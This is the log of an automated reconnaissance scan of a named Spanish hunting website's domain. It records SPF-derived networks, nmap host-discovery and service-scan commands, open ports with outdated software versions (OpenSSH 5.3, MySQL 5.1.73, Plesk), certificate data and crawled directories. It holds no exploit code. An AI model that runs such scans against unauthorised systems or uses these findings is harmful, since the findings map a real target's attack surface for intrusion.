718 New IP found: 82.223.85.0
719 WARNING! SPF record allows an entire network to send mails. Probably an ISP network. We are not going to check the entire network by now: 82.223.190.0/23, but only the network IP
720 New IP found: 82.223.190.0
721 WARNING! SPF record allows an entire network to send mails. Probably an ISP network. We are not going to check the entire network by now: 82.223.199.0/24, but only the network IP
722 New IP found: 82.223.199.0
723 WARNING! SPF record allows an entire network to send mails. Probably an ISP network. We are not going to check the entire network by now: 82.223.218.0/23, but only the network IP
724 New IP found: 82.223.218.0
725 WARNING! SPF record allows an entire network to send mails. Probably an ISP network. We are not going to check the entire network by now: 82.223.230.0/24, but only the network IP
726 New IP found: 82.223.230.0
727 WARNING! SPF record allows an entire network to send mails. Probably an ISP network. We are not going to check the entire network by now: 82.223.251.0/24, but only the network IP
728 New IP found: 82.223.251.0
729 WARNING! SPF record allows an entire network to send mails. Probably an ISP network. We are not going to check the entire network by now: 217.76.128.0/23, but only the network IP
730 New IP found: 217.76.128.0
731 WARNING! SPF record allows an entire network to send mails. Probably an ISP network. We are not going to check the entire network by now: 217.76.150.128/25, but only the network IP
732 New IP found: 217.76.150.128
733 WARNING! SPF record allows an entire network to send mails. Probably an ISP network. We are not going to check the entire network by now: 217.76.156.128/25, but only the network IP
734 New IP found: 217.76.156.128
735
736 Checking SPF record...
737 WARNING! SPF record allows an entire network to send mails. Probably an ISP network. We are not going to check the entire network by now: 82.223.56.0/23, but only the network IP
738 New IP found: 82.223.56.0
739 WARNING! SPF record allows an entire network to send mails. Probably an ISP network. We are not going to check the entire network by now: 82.223.113.0/24, but only the network IP
740 New IP found: 82.223.113.0
741 WARNING! SPF record allows an entire network to send mails. Probably an ISP network. We are not going to check the entire network by now: 82.223.119.0/24, but only the network IP
742 New IP found: 82.223.119.0
743 WARNING! SPF record allows an entire network to send mails. Probably an ISP network. We are not going to check the entire network by now: 82.223.226.0/24, but only the network IP
744 New IP found: 82.223.226.0
745 WARNING! SPF record allows an entire network to send mails. Probably an ISP network. We are not going to check the entire network by now: 217.76.130.0/23, but only the network IP
746 New IP found: 217.76.130.0
747 WARNING! SPF record allows an entire network to send mails. Probably an ISP network. We are not going to check the entire network by now: 217.76.148.0/23, but only the network IP
748 New IP found: 217.76.148.0
749 WARNING! SPF record allows an entire network to send mails. Probably an ISP network. We are not going to check the entire network by now: 217.76.143.0/24, but only the network IP
750 New IP found: 217.76.143.0
751 WARNING! SPF record allows an entire network to send mails. Probably an ISP network. We are not going to check the entire network by now: 217.76.150.0/25, but only the network IP
752 New IP found: 217.76.150.0
753 WARNING! SPF record allows an entire network to send mails. Probably an ISP network. We are not going to check the entire network by now: 217.76.156.0/25, but only the network IP
754 New IP found: 217.76.156.0
755 WARNING! SPF record allows an entire network to send mails. Probably an ISP network. We are not going to check the entire network by now: 217.76.132.128/25, but only the network IP
756 New IP found: 217.76.132.128
757 WARNING! SPF record allows an entire network to send mails. Probably an ISP network. We are not going to check the entire network by now: 82.223.208.0/24, but only the network IP
758 New IP found: 82.223.208.0
759 WARNING! SPF record allows an entire network to send mails. Probably an ISP network. We are not going to check the entire network by now: 82.223.212.0/23, but only the network IP
760 New IP found: 82.223.212.0
761
762 Checking 192 most common hostnames using system default resolver...
763 IP: 217.160.131.142 (Germany)
764 HostName: www.cazahispanica.com. Type: A
765 IP: 82.223.190.234 (Spain)
766 HostName: webmail.cazahispanica.com. Type: A
767
768 Checking with nmap the reverse DNS hostnames of every <ip>/24 netblock using system default resolver...
789
790 Searching for cazahispanica.com. emails in Google
791 info@cazahispanica.com
792
793 Checking 26 active hosts using nmap... (nmap -sn -n -v -PP -PM -PS80,25 -PA -PY -PU53,40125 -PE --reason <ip> -oA <output_directory>/nmap/<ip>.sn)
820
821 Checking ports on every active host using nmap... (nmap -O --reason --webxml --traceroute -sS -sV -sC -Pn -n -v -F <ip> -oA <output_directory>/nmap/<ip>)
822 Scanning ip 82.223.212.0 ():
823 Scanning ip 217.76.143.0 ():
824 Scanning ip 82.223.208.0 ():
825 Scanning ip 82.223.199.0 ():
826 Scanning ip 82.223.113.0 ():
827 Scanning ip 82.223.218.0 ():
828 Scanning ip 217.160.131.142 (www.cazahispanica.com.):
829 21/tcp open ftp syn-ack ttl 55 ProFTPD
830 | ssl-cert: Subject: commonName=Parallels Panel/organizationName=Parallels/stateOrProvinceName=Virginia/countryName=US
831 | Issuer: commonName=Parallels Panel/organizationName=Parallels/stateOrProvinceName=Virginia/countryName=US
832 | Public Key type: rsa
833 | Public Key bits: 2048
834 | Signature Algorithm: sha1WithRSAEncryption
835 | Not valid before: 2015-01-27T11:06:14
836 | Not valid after: 2016-01-27T11:06:14
837 | MD5: a6a6 4e22 2c06 27c2 58de c49a bb0d 1a38
838 |_SHA-1: 9907 1423 593d fbd3 32ec 7db7 e8fd b0b9 5581 3476
839 |_ssl-date: 2020-01-05T08:28:08+00:00; -3s from scanner time.
840 | tls-nextprotoneg:
841 |_ ftp
842 22/tcp open ssh syn-ack ttl 55 OpenSSH 5.3 (protocol 2.0)
843 | ssh-hostkey:
844 | 1024 a8:a9:da:bc:cb:8d:0b:ee:5c:06:94:59:e9:e1:9e:6e (DSA)
845 |_ 2048 95:1e:62:e2:8f:bb:20:92:a7:f4:ab:a7:44:f6:37:f0 (RSA)
846 80/tcp open http syn-ack ttl 55 Apache httpd (PleskLin)
847 |_http-favicon: Parallels Control Panel
848 | http-methods:
849 |_ Supported Methods: GET HEAD POST OPTIONS
850 |_http-server-header: Apache
851 |_http-title: Default Parallels Plesk Page
852 443/tcp open ssl/http syn-ack ttl 55 Apache httpd (PleskLin)
853 |_http-favicon: Parallels Control Panel
854 | http-methods:
855 |_ Supported Methods: GET HEAD POST OPTIONS
856 |_http-server-header: Apache
857 |_http-title: Default Parallels Plesk Page
858 | ssl-cert: Subject: commonName=Parallels Panel/organizationName=Parallels/stateOrProvinceName=Virginia/countryName=US
859 | Issuer: commonName=Parallels Panel/organizationName=Parallels/stateOrProvinceName=Virginia/countryName=US
860 | Public Key type: rsa
861 | Public Key bits: 2048
862 | Signature Algorithm: sha1WithRSAEncryption
863 | Not valid before: 2015-01-27T11:06:14
864 | Not valid after: 2016-01-27T11:06:14
865 | MD5: a6a6 4e22 2c06 27c2 58de c49a bb0d 1a38
866 |_SHA-1: 9907 1423 593d fbd3 32ec 7db7 e8fd b0b9 5581 3476
867 |_ssl-date: 2020-01-05T08:28:07+00:00; -3s from scanner time.
868 3306/tcp open mysql syn-ack ttl 55 MySQL 5.1.73
869 | mysql-info:
870 | Protocol: 10
871 | Version: 5.1.73
872 | Thread ID: 564831
873 | Capabilities flags: 63487
874 | Some Capabilities: Speaks41ProtocolOld, InteractiveClient, LongPassword, SupportsLoadDataLocal, Support41Auth, FoundRows, ConnectWithDatabase, LongColumnFlag, SupportsTransactions, SupportsCompression, IgnoreSigpipes, ODBCClient, IgnoreSpaceBeforeParenthesis, Speaks41ProtocolNew, DontAllowDatabaseTableColumn
875 | Status: Autocommit
876 |_ Salt: qEDdN7f|]<Trbq2EBZ"7
877 8443/tcp open ssl/http syn-ack ttl 55 sw-cp-server httpd (Plesk Onyx 17.8.11)
878 |_http-favicon: Parallels Plesk
879 | http-methods:
880 |_ Supported Methods: GET HEAD POST
881 | http-robots.txt: 1 disallowed entry
882 |_/
883 |_http-server-header: sw-cp-server
884 |_http-title: Plesk Onyx 17.8.11
885 | ssl-cert: Subject: commonName=Parallels Panel/organizationName=Parallels/stateOrProvinceName=Virginia/countryName=US
886 | Issuer: commonName=Parallels Panel/organizationName=Parallels/stateOrProvinceName=Virginia/countryName=US
887 | Public Key type: rsa
888 | Public Key bits: 2048
889 | Signature Algorithm: sha1WithRSAEncryption
890 | Not valid before: 2015-01-27T11:06:14
891 | Not valid after: 2016-01-27T11:06:14
892 | MD5: a6a6 4e22 2c06 27c2 58de c49a bb0d 1a38
893 |_SHA-1: 9907 1423 593d fbd3 32ec 7db7 e8fd b0b9 5581 3476
894 |_ssl-date: 2020-01-05T08:28:07+00:00; -3s from scanner time.
895 | tls-nextprotoneg:
896 |_ http/1.1
897 Device type: general purpose|router|storage-misc|broadband router|WAP
898 Running (JUST GUESSING): Linux 2.6.X|3.X (92%), MikroTik RouterOS 6.X (91%), HP embedded (89%), Ubiquiti embedded (89%), Ubiquiti AirOS 5.X (88%), AVM FritzOS 6.X (87%), Hitron embedded (87%)
899 |_clock-skew: mean: -3s, deviation: 0s, median: -3s
900 Scanning ip 82.223.226.0 ():
901 Scanning ip 82.223.85.0 ():
902 Scanning ip 217.76.128.0 ():
903 Scanning ip 82.223.119.0 ():
904 Scanning ip 82.223.230.0 ():
905 Scanning ip 217.76.150.0 ():
906 Scanning ip 217.76.150.128 ():
907 Scanning ip 217.76.128.164 (dns47.servidoresdns.net (PTR)):
908 53/tcp open domain syn-ack ttl 55 ISC BIND
909 Scanning ip 82.223.218.164 (dns48.servidoresdns.net (PTR)):
910 53/tcp open domain syn-ack ttl 56 ISC BIND
911 873/tcp open rsync syn-ack ttl 56 (protocol version 31)
912 Scanning ip 217.76.156.128 ():
913 Scanning ip 217.76.148.0 ():
914 Scanning ip 217.76.156.0 ():
915 Scanning ip 82.223.251.0 ():
916 Scanning ip 217.76.130.0 ():
917 Scanning ip 217.76.132.128 ():
918 Scanning ip 82.223.56.0 ():
919 Scanning ip 82.223.190.234 (webmail.cazahispanica.com.):
920 80/tcp open http syn-ack ttl 55 nginx
921 | http-methods:
922 |_ Supported Methods: GET HEAD POST OPTIONS
923 |_http-title: Did not follow redirect to https://serviciodecorreo.es/
924 443/tcp open ssl/http syn-ack ttl 55 nginx
925 | http-methods:
926 |_ Supported Methods: GET HEAD POST
927 | http-robots.txt: 1 disallowed entry
928 |_/
929 |_http-title: Webmail :: Welcome to Webmail
930 | ssl-cert: Subject: commonName=*.serviciodecorreo.es/organizationName=Arsys Internet S.L.U./stateOrProvinceName=La Rioja/countryName=ES
931 | Subject Alternative Name: DNS:*.serviciodecorreo.es, DNS:serviciodecorreo.es
932 | Issuer: commonName=Thawte RSA CA 2018/organizationName=DigiCert Inc/countryName=US
933 | Public Key type: rsa
934 | Public Key bits: 2048
935 | Signature Algorithm: sha256WithRSAEncryption
936 | Not valid before: 2018-04-03T00:00:00
937 | Not valid after: 2020-04-03T12:00:00
938 | MD5: 22c2 7e86 0420 22c3 1971 6285 22e9 2c4e
939 |_SHA-1: 1074 ed9e 57e8 e0ea c306 252e 0c74 ad7b ac1b 8e10
940 |_ssl-date: TLS randomness does not represent time
941 | tls-alpn:
942 |_ http/1.1
943 | tls-nextprotoneg:
944 |_ http/1.1
945 Running (JUST GUESSING): Linux 3.X|4.X (85%)
946 Scanning ip 82.223.190.0 ():
947 Scanning ip 82.223.190.100 (mx.serviciodecorreo.es (PTR)):
948 WebCrawling domain's web servers... up to 50 max links.
949
950 + URL to crawl: http://www.cazahispanica.com.
951 + Date: 2020-01-05
952
953 + Crawling URL: http://www.cazahispanica.com.:
954 + Links:
955 + Crawling http://www.cazahispanica.com.
956 + Crawling http://www.cazahispanica.com./netdna.bootstrapcdn.com/bootstrap/3.1.1/css/bootstrap.min.css?ver=4.4.21 (404 Not Found)
957 + Crawling http://www.cazahispanica.com./
958 + Crawling http://www.cazahispanica.com./netdna.bootstrapcdn.com/bootstrap/3.1.1/js/bootstrap.min.js?ver=4.4.21 (404 Not Found)
959 + Searching for directories...
960 - Found: http://www.cazahispanica.com./netdna.bootstrapcdn.com/
961 - Found: http://www.cazahispanica.com./netdna.bootstrapcdn.com/bootstrap/
962 - Found: http://www.cazahispanica.com./netdna.bootstrapcdn.com/bootstrap/3.1.1/
963 - Found: http://www.cazahispanica.com./netdna.bootstrapcdn.com/bootstrap/3.1.1/css/
964 - Found: http://www.cazahispanica.com./netdna.bootstrapcdn.com/bootstrap/3.1.1/js/
965 + Searching open folders...
966 - http://www.cazahispanica.com./netdna.bootstrapcdn.com/ (404 Not Found)
967 - http://www.cazahispanica.com./netdna.bootstrapcdn.com/bootstrap/ (404 Not Found)
968 - http://www.cazahispanica.com./netdna.bootstrapcdn.com/bootstrap/3.1.1/ (404 Not Found)
969 - http://www.cazahispanica.com./netdna.bootstrapcdn.com/bootstrap/3.1.1/css/ (404 Not Found)
970 - http://www.cazahispanica.com./netdna.bootstrapcdn.com/bootstrap/3.1.1/js/ (404 Not Found)
971 + Crawl finished successfully.
972----------------------------------------------------------------------
973Summary of http://http://www.cazahispanica.com.
974----------------------------------------------------------------------
975+ Links crawled:
976 - http://www.cazahispanica.com.
977 - http://www.cazahispanica.com./
978 - http://www.cazahispanica.com./netdna.bootstrapcdn.com/bootstrap/3.1.1/css/bootstrap.min.css?ver=4.4.21 (404 Not Found)
979 - http://www.cazahispanica.com./netdna.bootstrapcdn.com/bootstrap/3.1.1/js/bootstrap.min.js?ver=4.4.21 (404 Not Found)
980 Total links crawled: 4
981
982+ Links to files found:
983 Total links to files: 0
984
985+ Externals links found:
1078 Total external links: 92
1079
1080+ Email addresses found:
1081 Total email address found: 0
1082
1083+ Directories found:
1084 - http://www.cazahispanica.com./netdna.bootstrapcdn.com/ (404 Not Found)
1085 - http://www.cazahispanica.com./netdna.bootstrapcdn.com/bootstrap/ (404 Not Found)
1086 - http://www.cazahispanica.com./netdna.bootstrapcdn.com/bootstrap/3.1.1/ (404 Not Found)
1087 - http://www.cazahispanica.com./netdna.bootstrapcdn.com/bootstrap/3.1.1/css/ (404 Not Found)
1088 - http://www.cazahispanica.com./netdna.bootstrapcdn.com/bootstrap/3.1.1/js/ (404 Not Found)
1089 Total directories: 5
1090
1091+ Directory indexing found:
1092 Total directories with indexing: 0
1093
1094----------------------------------------------------------------------
1095
1096
1097 + URL to crawl: https://www.cazahispanica.com.
1098 + Date: 2020-01-05
1099
1100 + Crawling URL: https://www.cazahispanica.com.:
1101 + Links:
1102 + Crawling https://www.cazahispanica.com. ([SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed (_ssl.c:727))
1103 + Searching for directories...
1104 + Searching open folders...
1105
1106
1107 + URL to crawl: https://www.cazahispanica.com.:8443
1108 + Date: 2020-01-05
1109
1110 + Crawling URL: https://www.cazahispanica.com.:8443:
1111 + Links:
1112 + Crawling https://www.cazahispanica.com.:8443 ([SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed (_ssl.c:727))
1113 + Searching for directories...
1114 + Searching open folders...
1115
1116
1117 + URL to crawl: http://webmail.cazahispanica.com.
1118 + Date: 2020-01-05
1119
1120 + Crawling URL: http://webmail.cazahispanica.com.:
1121 + Links:
1122 + Crawling http://webmail.cazahispanica.com.
1123 + Crawling http://webmail.cazahispanica.com./skins/larry/styles.min.css?s=1493368165 (File! Not crawling it.)
1124 + Crawling http://webmail.cazahispanica.com./skins/larry/svggradients.min.css?s=1493368165 (File! Not crawling it.)
1125 + Crawling http://webmail.cazahispanica.com./xframework/assets/styles/framework.css?s=1497340056 (404 Not Found)
1126 + Crawling http://webmail.cazahispanica.com./plugins/jqueryui/themes/larry/jquery-ui-1.10.4.custom.css?s=1493368164 (File! Not crawling it.)
1127 + Crawling http://webmail.cazahispanica.com./plugins/xskin/assets/styles/xdesktop.css?s=1497339944 (File! Not crawling it.)
1128 + Crawling http://webmail.cazahispanica.com./
1129 + Crawling http://webmail.cazahispanica.com./skins/larry/ui.min.js?s=1493368165 (File! Not crawling it.)
1130 + Crawling http://webmail.cazahispanica.com./program/js/jquery.min.js?s=1493368164 (File! Not crawling it.)
1131 + Crawling http://webmail.cazahispanica.com./program/js/common.min.js?s=1493368164 (File! Not crawling it.)
1132 + Crawling http://webmail.cazahispanica.com./program/js/app.min.js?s=1493368164 (File! Not crawling it.)
1133 + Crawling http://webmail.cazahispanica.com./program/js/jstz.min.js?s=1493368164 (File! Not crawling it.)
1134 + Crawling http://webmail.cazahispanica.com./xframework/assets/scripts/framework.min.js?s=1497340056 (404 Not Found)
1135 + Crawling http://webmail.cazahispanica.com./plugins/jqueryui/js/jquery-ui-1.10.4.custom.min.js?s=1493368164 (File! Not crawling it.)
1136 + Crawling http://webmail.cazahispanica.com./plugins/xskin/assets/scripts/xskin.min.js?s=1497339944 (File! Not crawling it.)
1137 + Crawling http://webmail.cazahispanica.com./plugins/xskin/assets/scripts/xdesktop.min.js?s=1497339944 (File! Not crawling it.)
1138 + Searching for directories...
1139 - Found: http://webmail.cazahispanica.com./xframework/
1140 - Found: http://webmail.cazahispanica.com./xframework/assets/
1141 - Found: http://webmail.cazahispanica.com./xframework/assets/styles/
1142 - Found: http://webmail.cazahispanica.com./xframework/assets/scripts/
1143 - Found: http://webmail.cazahispanica.com./skins/
1144 - Found: http://webmail.cazahispanica.com./skins/larry/
1145 - Found: http://webmail.cazahispanica.com./skins/larry/images/
1146 - Found: http://webmail.cazahispanica.com./images/
1147 - Found: http://webmail.cazahispanica.com./plugins/
1148 - Found: http://webmail.cazahispanica.com./plugins/jqueryui/
1149 - Found: http://webmail.cazahispanica.com./plugins/jqueryui/themes/
1150 - Found: http://webmail.cazahispanica.com./plugins/jqueryui/themes/larry/
1151 - Found: http://webmail.cazahispanica.com./plugins/xskin/
1152 - Found: http://webmail.cazahispanica.com./plugins/xskin/assets/
1153 - Found: http://webmail.cazahispanica.com./plugins/xskin/assets/styles/
1154 - Found: http://webmail.cazahispanica.com./program/
1155 - Found: http://webmail.cazahispanica.com./program/js/
1156 - Found: http://webmail.cazahispanica.com./plugins/jqueryui/js/
1157 - Found: http://webmail.cazahispanica.com./plugins/xskin/assets/scripts/
1158 + Searching open folders...
1159 - http://webmail.cazahispanica.com./xframework/ (404 Not Found)
1160 - http://webmail.cazahispanica.com./xframework/assets/ (404 Not Found)
1161 - http://webmail.cazahispanica.com./xframework/assets/styles/ (404 Not Found)
1162 - http://webmail.cazahispanica.com./xframework/assets/scripts/ (404 Not Found)
1163 - http://webmail.cazahispanica.com./skins/ (403 Forbidden)
1164 - http://webmail.cazahispanica.com./skins/larry/ (403 Forbidden)
1165 - http://webmail.cazahispanica.com./skins/larry/images/ (403 Forbidden)
1166 - http://webmail.cazahispanica.com./images/ (403 Forbidden)
1167 - http://webmail.cazahispanica.com./plugins/ (403 Forbidden)
1168 - http://webmail.cazahispanica.com./plugins/jqueryui/ (403 Forbidden)
1169 - http://webmail.cazahispanica.com./plugins/jqueryui/themes/ (403 Forbidden)
1170 - http://webmail.cazahispanica.com./plugins/jqueryui/themes/larry/ (403 Forbidden)
1171 - http://webmail.cazahispanica.com./plugins/xskin/ (403 Forbidden)
1172 - http://webmail.cazahispanica.com./plugins/xskin/assets/ (403 Forbidden)
1173 - http://webmail.cazahispanica.com./plugins/xskin/assets/styles/ (403 Forbidden)
1174 - http://webmail.cazahispanica.com./program/ (403 Forbidden)
1175 - http://webmail.cazahispanica.com./program/js/ (403 Forbidden)
1176 - http://webmail.cazahispanica.com./plugins/jqueryui/js/ (403 Forbidden)
1177 - http://webmail.cazahispanica.com./plugins/xskin/assets/scripts/ (403 Forbidden)
1178 + Crawl finished successfully.
1179----------------------------------------------------------------------
1180Summary of http://http://webmail.cazahispanica.com.
1181----------------------------------------------------------------------
1182+ Links crawled:
1183 - http://webmail.cazahispanica.com.
1184 - http://webmail.cazahispanica.com./
1185 - http://webmail.cazahispanica.com./xframework/assets/scripts/framework.min.js?s=1497340056 (404 Not Found)
1186 - http://webmail.cazahispanica.com./xframework/assets/styles/framework.css?s=1497340056 (404 Not Found)
1187 Total links crawled: 4
1188
1189+ Links to files found:
1190 - http://webmail.cazahispanica.com./images/serviciodecorreo.es_bright.png
1191 - http://webmail.cazahispanica.com./plugins/jqueryui/js/jquery-ui-1.10.4.custom.min.js?s=1493368164
1192 - http://webmail.cazahispanica.com./plugins/jqueryui/themes/larry/jquery-ui-1.10.4.custom.css?s=1493368164
1193 - http://webmail.cazahispanica.com./plugins/xskin/assets/scripts/xdesktop.min.js?s=1497339944
1194 - http://webmail.cazahispanica.com./plugins/xskin/assets/scripts/xskin.min.js?s=1497339944
1195 - http://webmail.cazahispanica.com./plugins/xskin/assets/styles/xdesktop.css?s=1497339944
1196 - http://webmail.cazahispanica.com./program/js/app.min.js?s=1493368164
1197 - http://webmail.cazahispanica.com./program/js/common.min.js?s=1493368164
1198 - http://webmail.cazahispanica.com./program/js/jquery.min.js?s=1493368164
1199 - http://webmail.cazahispanica.com./program/js/jstz.min.js?s=1493368164
1200 - http://webmail.cazahispanica.com./skins/larry/images/favicon.ico
1201 - http://webmail.cazahispanica.com./skins/larry/styles.min.css?s=1493368165
1202 - http://webmail.cazahispanica.com./skins/larry/svggradients.min.css?s=1493368165
1203 - http://webmail.cazahispanica.com./skins/larry/ui.min.js?s=1493368165
1204 Total links to files: 14
1205
1206+ Externals links found:
1207 - https://serviciodecorreo.es/help/configuracion_serviciodecorreo.es.pdf
1208 - https://serviciodecorreo.es/images/serviciodecorreo.es_dark.png
1209 Total external links: 2
1210
1211+ Email addresses found:
1212 Total email address found: 0
1213
1214+ Directories found:
1215 - http://webmail.cazahispanica.com./images/ (403 Forbidden)
1216 - http://webmail.cazahispanica.com./plugins/ (403 Forbidden)
1217 - http://webmail.cazahispanica.com./plugins/jqueryui/ (403 Forbidden)
1218 - http://webmail.cazahispanica.com./plugins/jqueryui/js/ (403 Forbidden)
1219 - http://webmail.cazahispanica.com./plugins/jqueryui/themes/ (403 Forbidden)
1220 - http://webmail.cazahispanica.com./plugins/jqueryui/themes/larry/ (403 Forbidden)
1221 - http://webmail.cazahispanica.com./plugins/xskin/ (403 Forbidden)
1222 - http://webmail.cazahispanica.com./plugins/xskin/assets/ (403 Forbidden)
1223 - http://webmail.cazahispanica.com./plugins/xskin/assets/scripts/ (403 Forbidden)
1224 - http://webmail.cazahispanica.com./plugins/xskin/assets/styles/ (403 Forbidden)
1225 - http://webmail.cazahispanica.com./program/ (403 Forbidden)
1226 - http://webmail.cazahispanica.com./program/js/ (403 Forbidden)
1227 - http://webmail.cazahispanica.com./skins/ (403 Forbidden)
1228 - http://webmail.cazahispanica.com./skins/larry/ (403 Forbidden)
1229 - http://webmail.cazahispanica.com./skins/larry/images/ (403 Forbidden)
1230 - http://webmail.cazahispanica.com./xframework/ (404 Not Found)
1231 - http://webmail.cazahispanica.com./xframework/assets/ (404 Not Found)
1232 - http://webmail.cazahispanica.com./xframework/assets/scripts/ (404 Not Found)
1233 - http://webmail.cazahispanica.com./xframework/assets/styles/ (404 Not Found)
1234 Total directories: 19
1235
1236+ Directory indexing found:
1237 Total directories with indexing: 0
1238
1239----------------------------------------------------------------------
1240
1241
1242 + URL to crawl: https://webmail.cazahispanica.com.
1243 + Date: 2020-01-05
1244
1245 + Crawling URL: https://webmail.cazahispanica.com.:
1246 + Links:
1247 + Crawling https://webmail.cazahispanica.com.
1248 + Searching for directories...
1249 + Searching open folders...
1250
1251--Finished--
1252Summary information for domain cazahispanica.com.
1253-----------------------------------------
1254 Domain Specific Information:
1255 Email: info@cazahispanica.com
1256
1257 Domain Ips Information:
1258 IP: 82.223.212.0
1259 Type: SPF
1260 Is Active: True (reset ttl 64)
1261 IP: 217.76.143.0
1262 Type: SPF
1263 Is Active: True (reset ttl 64)
1264 IP: 82.223.208.0
1265 Type: SPF
1266 Is Active: True (reset ttl 64)
1267 IP: 82.223.199.0
1268 Type: SPF
1269 Is Active: True (reset ttl 64)
1270 IP: 82.223.113.0
1271 Type: SPF
1272 Is Active: True (reset ttl 64)
1273 IP: 82.223.218.0
1274 Type: SPF
1275 Is Active: True (reset ttl 64)
1276 IP: 217.160.131.142
1277 HostName: www.cazahispanica.com. Type: A
1278 Country: Germany
1279 Is Active: True (reset ttl 64)
1280 Port: 21/tcp open ftp syn-ack ttl 55 ProFTPD
1281 Script Info: | ssl-cert: Subject: commonName=Parallels Panel/organizationName=Parallels/stateOrProvinceName=Virginia/countryName=US
1282 Script Info: | Issuer: commonName=Parallels Panel/organizationName=Parallels/stateOrProvinceName=Virginia/countryName=US
1283 Script Info: | Public Key type: rsa
1284 Script Info: | Public Key bits: 2048
1285 Script Info: | Signature Algorithm: sha1WithRSAEncryption
1286 Script Info: | Not valid before: 2015-01-27T11:06:14
1287 Script Info: | Not valid after: 2016-01-27T11:06:14
1288 Script Info: | MD5: a6a6 4e22 2c06 27c2 58de c49a bb0d 1a38
1289 Script Info: |_SHA-1: 9907 1423 593d fbd3 32ec 7db7 e8fd b0b9 5581 3476
1290 Script Info: |_ssl-date: 2020-01-05T08:28:08+00:00; -3s from scanner time.
1291 Script Info: | tls-nextprotoneg:
1292 Script Info: |_ ftp
1293 Port: 22/tcp open ssh syn-ack ttl 55 OpenSSH 5.3 (protocol 2.0)
1294 Script Info: | ssh-hostkey:
1295 Script Info: | 1024 a8:a9:da:bc:cb:8d:0b:ee:5c:06:94:59:e9:e1:9e:6e (DSA)
1296 Script Info: |_ 2048 95:1e:62:e2:8f:bb:20:92:a7:f4:ab:a7:44:f6:37:f0 (RSA)
1297 Port: 80/tcp open http syn-ack ttl 55 Apache httpd (PleskLin)
1298 Script Info: |_http-favicon: Parallels Control Panel
1299 Script Info: | http-methods:
1300 Script Info: |_ Supported Methods: GET HEAD POST OPTIONS
1301 Script Info: |_http-server-header: Apache
1302 Script Info: |_http-title: Default Parallels Plesk Page
1303 Port: 443/tcp open ssl/http syn-ack ttl 55 Apache httpd (PleskLin)
1304 Script Info: |_http-favicon: Parallels Control Panel
1305 Script Info: | http-methods:
1306 Script Info: |_ Supported Methods: GET HEAD POST OPTIONS
1307 Script Info: |_http-server-header: Apache
1308 Script Info: |_http-title: Default Parallels Plesk Page
1309 Script Info: | ssl-cert: Subject: commonName=Parallels Panel/organizationName=Parallels/stateOrProvinceName=Virginia/countryName=US
1310 Script Info: | Issuer: commonName=Parallels Panel/organizationName=Parallels/stateOrProvinceName=Virginia/countryName=US
1311 Script Info: | Public Key type: rsa
1312 Script Info: | Public Key bits: 2048
1313 Script Info: | Signature Algorithm: sha1WithRSAEncryption
1314 Script Info: | Not valid before: 2015-01-27T11:06:14
1315 Script Info: | Not valid after: 2016-01-27T11:06:14
1316 Script Info: | MD5: a6a6 4e22 2c06 27c2 58de c49a bb0d 1a38
1317 Script Info: |_SHA-1: 9907 1423 593d fbd3 32ec 7db7 e8fd b0b9 5581 3476
1318 Script Info: |_ssl-date: 2020-01-05T08:28:07+00:00; -3s from scanner time.
1319 Port: 3306/tcp open mysql syn-ack ttl 55 MySQL 5.1.73
1320 Script Info: | mysql-info:
1321 Script Info: | Protocol: 10
1322 Script Info: | Version: 5.1.73
1323 Script Info: | Thread ID: 564831
1324 Script Info: | Capabilities flags: 63487
1325 Script Info: | Some Capabilities: Speaks41ProtocolOld, InteractiveClient, LongPassword, SupportsLoadDataLocal, Support41Auth, FoundRows, ConnectWithDatabase, LongColumnFlag, SupportsTransactions, SupportsCompression, IgnoreSigpipes, ODBCClient, IgnoreSpaceBeforeParenthesis, Speaks41ProtocolNew, DontAllowDatabaseTableColumn
1326 Script Info: | Status: Autocommit
1327 Script Info: |_ Salt: qEDdN7f|]<Trbq2EBZ"7
1328 Port: 8443/tcp open ssl/http syn-ack ttl 55 sw-cp-server httpd (Plesk Onyx 17.8.11)
1329 Script Info: |_http-favicon: Parallels Plesk
1330 Script Info: | http-methods:
1331 Script Info: |_ Supported Methods: GET HEAD POST
1332 Script Info: | http-robots.txt: 1 disallowed entry
1333 Script Info: |_/
1334 Script Info: |_http-server-header: sw-cp-server
1335 Script Info: |_http-title: Plesk Onyx 17.8.11
1336 Script Info: | ssl-cert: Subject: commonName=Parallels Panel/organizationName=Parallels/stateOrProvinceName=Virginia/countryName=US
1337 Script Info: | Issuer: commonName=Parallels Panel/organizationName=Parallels/stateOrProvinceName=Virginia/countryName=US
1338 Script Info: | Public Key type: rsa
1339 Script Info: | Public Key bits: 2048
1340 Script Info: | Signature Algorithm: sha1WithRSAEncryption
1341 Script Info: | Not valid before: 2015-01-27T11:06:14
1342 Script Info: | Not valid after: 2016-01-27T11:06:14
1343 Script Info: | MD5: a6a6 4e22 2c06 27c2 58de c49a bb0d 1a38
1344 Script Info: |_SHA-1: 9907 1423 593d fbd3 32ec 7db7 e8fd b0b9 5581 3476
1345 Script Info: |_ssl-date: 2020-01-05T08:28:07+00:00; -3s from scanner time.
1346 Script Info: | tls-nextprotoneg:
1347 Script Info: |_ http/1.1
1348 Script Info: Device type: general purpose|router|storage-misc|broadband router|WAP
1349 Script Info: Running (JUST GUESSING): Linux 2.6.X|3.X (92%), MikroTik RouterOS 6.X (91%), HP embedded (89%), Ubiquiti embedded (89%), Ubiquiti AirOS 5.X (88%), AVM FritzOS 6.X (87%), Hitron embedded (87%)
1350 Script Info: |_clock-skew: mean: -3s, deviation: 0s, median: -3s
1351 IP: 82.223.226.0
1352 Type: SPF
1353 Is Active: True (reset ttl 64)
1354 IP: 82.223.85.0
1355 Type: SPF
1356 Is Active: True (reset ttl 64)
1357 IP: 217.76.128.0
1358 Type: SPF
1359 Is Active: True (reset ttl 64)
1360 IP: 82.223.119.0
1361 Type: SPF
1362 Is Active: True (reset ttl 64)
1363 IP: 82.223.230.0
1364 Type: SPF
1365 Is Active: True (reset ttl 64)
1366 IP: 217.76.150.0
1367 Type: SPF
1368 Is Active: True (reset ttl 64)
1369 IP: 217.76.150.128
1370 Type: SPF
1371 Is Active: True (reset ttl 64)
1372 IP: 217.76.128.164
1373 HostName: dns47.servidoresdns.net Type: NS
1374 HostName: dns47.servidoresdns.net Type: PTR
1375 Country: Spain
1376 Is Active: True (reset ttl 64)
1377 Port: 53/tcp open domain syn-ack ttl 55 ISC BIND
1378 IP: 82.223.218.164
1379 HostName: dns48.servidoresdns.net Type: NS
1380 HostName: dns48.servidoresdns.net Type: PTR
1381 Country: Spain
1382 Is Active: True (reset ttl 64)
